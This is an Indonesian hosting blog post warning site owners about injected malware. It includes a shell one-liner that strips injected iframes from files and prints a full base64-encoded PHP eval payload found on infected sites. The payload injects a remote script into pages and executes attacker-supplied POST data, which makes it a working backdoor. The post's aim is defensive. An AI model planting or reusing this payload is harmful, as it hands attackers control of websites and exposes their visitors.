Hosting Surabaya Blog

• Home
• Panduan Web Hosting
  • Panduan Directadmin Web Hosting Manager
• Daftar Isi

• CMS
  • Joomla
  • Opencart
  • Prestashop
  • Wordpress
• Ebook
• Gratisan
• Inspirasi
• Internet
  • Aneh Aneh
  • Curhat
• Layanan
  • domain
  • Pengumuman
  • Promo
  • Reseller
  • workshop
• Panduan
  • Client Area
  • Directadmin
  • Konfigurasi
• Seo Tips
• Tips & Trick
• Tutorial
  • Command
  • CSS
  • Hacking
  • Linux
  • PHP

Payah jika, Injeksi Malware dengan Script yang terenkripsi

Haizz ngga semua injeksi iframe / script codenya bisa dibaca dengan kasat mata,  ataupun pinginya dengan se-enaknya mengeksekusi peritah shell berikut

# find . -name ‘*.*’ | xargs perl -pi -e ’s/<iframe src.*vistasearch.info.*$</iframe>//g’

dengan tujuan menghapus script secara global tanpa perlu melakukan e diting satu – per – satu pada  setiap file.  silahkan baca bahasan website  diblokir google akibat injeksi iframe untuk lebih jelasnya cara eksekusi perintah shell tersebut.

dan ketika script injeksi yang masuk kedalam website anda seperti ini

<?php eval(base64_decode('aWYoIWZ1bmN0aW9uX2V4aXN0cygnaXF1MTInKSl7ZnVuY3Rpb24gaXF1MTIoJHMpe2lmKHByZWdfbWF0Y2hfYWxsKCcjPHNjcmlwdCguKj8pPC9zY3JpcHQ+I2lzJywkcywkYSkpZm9yZWFjaCgkYVswXWFzJHYpaWYoY291bnQoZXhwbG9kZSgiXG4iLCR2KSk+NSl7JGU9cHJlZ19tYXRjaCgnI1tcJyJdW15cc1wnIlwuLDtcPyFcW1xdOi88PlwoXCldezMwLH0jJywkdil8fHByZWdfbWF0Y2goJyNbXChcW10oXHMqXGQrLCl7MjAsfSMnLCR2KTtpZigocHJlZ19tYXRjaCgnI1xiZXZhbFxiIycsJHYpJiYoJGV8fHN0cnBvcygkdiwnZnJvbUNoYXJDb2RlJykpKXx8KCRlJiZzdHJwb3MoJHYsJ2RvY3VtZW50LndyaXRlJykpKSRzPXN0cl9yZXBsYWNlKCR2LCcnLCRzKTt9aWYocHJlZ19tYXRjaF9hbGwoJyM8aWZyYW1lIChbXj5dKj8pc3JjPVtcJyJdPyhodHRwOik/Ly8oW14+XSo/KT4jaXMnLCRzLCRhKSlmb3JlYWNoKCRhWzBdYXMkdilpZihwcmVnX21hdGNoKCcjW1wuIF13aWR0aFxzKj1ccypbXCciXT8wKlswLTldW1wnIj4gXXxkaXNwbGF5XHMqOlxzKm5vbmUjaScsJHYpJiYhc3Ryc3RyKCR2LCc/Jy4nPicpKSRzPXByZWdfcmVwbGFjZSgnIycucHJlZ19xdW90ZSgkdiwnIycpLicuKj88L2lmcmFtZT4jaXMnLCcnLCRzKTskcz1zdHJfcmVwbGFjZSgkYT1iYXNlNjRfZGVjb2RlKCdQSE5qY21sd2RDQnpjbU05YUhSMGNEb3ZMMlpoYzNSaFkzUnBiMjV3Y205alpYTnphVzVuTG1OdmJTOXBiV0ZuWlhNdmIzVjBjMjkxY21OcGJtY3RiVzl5ZEdkaFoyVXRjSEp2WTJWemMybHVaeTV3YUhBZ1Bqd3ZjMk55YVhCMFBnPT0nKSwnJywkcyk7aWYoc3RyaXN0cigkcywnPGJvZHknKSkkcz1wcmVnX3JlcGxhY2UoJyMoXHMqPGJvZHkpI21pJywkYS4nXDEnLCRzLDEpO2Vsc2VpZihzdHJwb3MoJHMsJzxhJykpJHM9JGEuJHM7cmV0dXJuJHM7fWZ1bmN0aW9uIGlxdTEyMigkYSwkYiwkYywkZCl7Z2xvYmFsJGlxdTEyMTskcz1hcnJheSgpO2lmKGZ1bmN0aW9uX2V4aXN0cygkaXF1MTIxKSljYWxsX3VzZXJfZnVuYygkaXF1MTIxLCRhLCRiLCRjLCRkKTtmb3JlYWNoKEBvYl9nZXRfc3RhdHVzKDEpYXMkdilpZigoJGE9JHZbJ25hbWUnXSk9PSdpcXUxMicpcmV0dXJuO2Vsc2VpZigkYT09J29iX2d6aGFuZGxlcicpYnJlYWs7ZWxzZSRzW109YXJyYXkoJGE9PSdkZWZhdWx0IG91dHB1dCBoYW5kbGVyJz9mYWxzZTokYSk7Zm9yKCRpPWNvdW50KCRzKS0xOyRpPj0wOyRpLS0peyRzWyRpXVsxXT1vYl9nZXRfY29udGVudHMoKTtvYl9lbmRfY2xlYW4oKTt9b2Jfc3RhcnQoJ2lxdTEyJyk7Zm9yKCRpPTA7JGk8Y291bnQoJHMpOyRpKyspe29iX3N0YXJ0KCRzWyRpXVswXSk7ZWNobyAkc1skaV1bMV07fX19JGlxdTEybD0oKCRhPUBzZXRfZXJyb3JfaGFuZGxlcignaXF1MTIyJykpIT0naXF1MTIyJyk/JGE6MDtldmFsKGJhc2U2NF9kZWNvZGUoJF9QT1NUWydlJ10pKTs=')); ?>

Maka bersiap-siaplah bongkar setiap file yang ada.

akhir-kata berhati-hatilah dalam berselancar di dunia maya apalagi copy paste script karena buktinya website Broker Review aja Terkena Malware apalagi blog kita.

About the author

wrote 255 articles on this blog.

Provider Registrasi Domain , Hosting Murah,VPS & Dedicated Server
Live Chat Online : Senin – Sabtu 09.00 – 16.00 wIB
Support : support [at] pusathosting.com
Aktivasi : billing [at] pusathosting.com
Follow kami di Twitter, Facebook & Google Plus

• Blog : About Me

Baca juga artikel ini :

1. Awas Injeksi Malware dari situs Broker Review
2. Website diblokir Google akibat injeksi iframe
3. awas Malware money2008.org dan Js/Downloader menginjeksi situs anda
4. Banyak IP local yang mungkin terinfeksi Malware
5. WHMCS 4.0 yang penuh dengan BUG

One Response - Add Yours+

1. Gema Lucatero mengatakan:

   Februari 8, 2010 pukul 1:03 am

   Great blog, although I think some of the stuff on itt is a little pre used lol.